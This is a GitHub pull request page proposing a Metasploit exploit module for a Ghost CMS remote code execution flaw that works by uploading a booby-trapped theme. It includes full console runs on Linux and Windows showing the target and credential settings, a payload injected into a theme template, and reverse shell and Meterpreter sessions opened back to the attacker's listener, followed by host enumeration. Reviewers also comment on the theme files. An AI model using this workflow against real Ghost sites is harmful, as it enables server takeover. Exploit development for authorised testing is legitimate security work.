
Add CVE-2026-29053 #21234

Open
vognik wants to merge 5 commits into rapid7:master from vognik:CVE-2026-29053

Conversation

@vognik (Contributor) commented Apr 4, 2026

Vulnerability Details

This module exploits a Remote Code Execution (RCE) vulnerability in Ghost CMS.
Specifically crafted malicious themes can execute arbitrary code on the server running Ghost.

Module Information

Module path: modules/exploits/multi/http/ghostcms_cve_2026_29053.rb
Platform: Linux/Unix/Windows

References

Test Output

Linux

msf6 > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/unix/reverse_nodejs
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 127.0.0.1
RHOSTS => 127.0.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set LHOST 172.17.0.1
LHOST => 172.17.0.1
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 172.17.0.1:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[!] Ghost CMS requires a 6-digit verification code from your email.
[*] Enter the 6-digit verification code: 738757
[*] Verifying session with code: 738757...
[+] 2FA verification successful! Session established.
[+] Authentication successful!
[*] Downloading active theme 'source' from server...
[*] Injecting payload into: page-fltyuvdvtgcgi.hbs
[*] Uploading infected theme: wfnlfezetpeeoggx
[*] Triggering payload...
[*] Command shell session 1 opened (172.17.0.1:4444 -> 172.18.0.3:48654) at 2026-04-04 19:16:26 -0400
whoami
node
cat /etc/os-release
PRETTY_NAME="Debian GNU/Linux 12 (bookworm)"
NAME="Debian GNU/Linux"
VERSION_ID="12"
VERSION="12 (bookworm)"
VERSION_CODENAME=bookworm
ID=debian
HOME_URL="https://www.debian.org/"
SUPPORT_URL="https://www.debian.org/support"
BUG_REPORT_URL="https://bugs.debian.org/"

Windows

msf > use multi/http/ghostcms_cve_2026_29053
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RHOSTS 192.168.19.148
RHOSTS => 192.168.19.148
msf exploit(multi/http/ghostcms_cve_2026_29053) > set RPORT 2368
RPORT => 2368
msf exploit(multi/http/ghostcms_cve_2026_29053) > set USERNAME test@gmail.com
USERNAME => test@gmail.com
msf exploit(multi/http/ghostcms_cve_2026_29053) > set PASSWORD 16pm1ewtya
PASSWORD => 16pm1ewtya
msf exploit(multi/http/ghostcms_cve_2026_29053) > set target 1
target => 1
msf exploit(multi/http/ghostcms_cve_2026_29053) > run
[*] Started reverse TCP handler on 192.168.19.130:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Sending stage (232006 bytes) to 192.168.19.148
[+] The target appears to be vulnerable.
[*] Authenticating via session (user: test@gmail.com)...
[+] Session established via password.
[+] Authentication successful!
[*] Downloading active theme 'esnraytnjot' from server...
[*] Injecting payload into: author-john.hbs
[*] Uploading infected theme: fcffvppatcvqkzf
[*] Triggering payload...
[*] Meterpreter session 1 opened (192.168.19.130:4444 -> 192.168.19.148:53278) at 2026-04-04 13:22:38 -0400

meterpreter > sysinfo
Computer        : DESKTOP-vognik
OS              : Windows 10 21H2.
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-vognik\vognik

@vognik vognik marked this pull request as draft April 4, 2026 18:34
@h00die (Contributor) commented Apr 4, 2026

Are all of these files required to get the exploit working? There are a LOT of files for the theme, the yarn.lock file itself is 3,500 lines of code.

If they are all required, I'd suggest zipping them all together, since you likely do that in the code anyway. Then, if you need to adjust anything in the zip, just do it in memory.

However, we'd want a minimalistic theme for exploiting, so really look at what's required and what's not.

@vognik (Contributor, Author) commented Apr 4, 2026

If they are all required, I'd suggest zipping them all together, since you likely do that in the code anyway. Then, if you need to adjust anything in the zip, just do it in memory.

@h00die Sorry, I didn't notice the line count before committing. Anyway, I wanted to give the end user more flexibility if they want to add new files. It's more convenient to add them to a folder rather than pack/unpack an archive every time.

@vognik vognik marked this pull request as ready for review April 5, 2026 01:56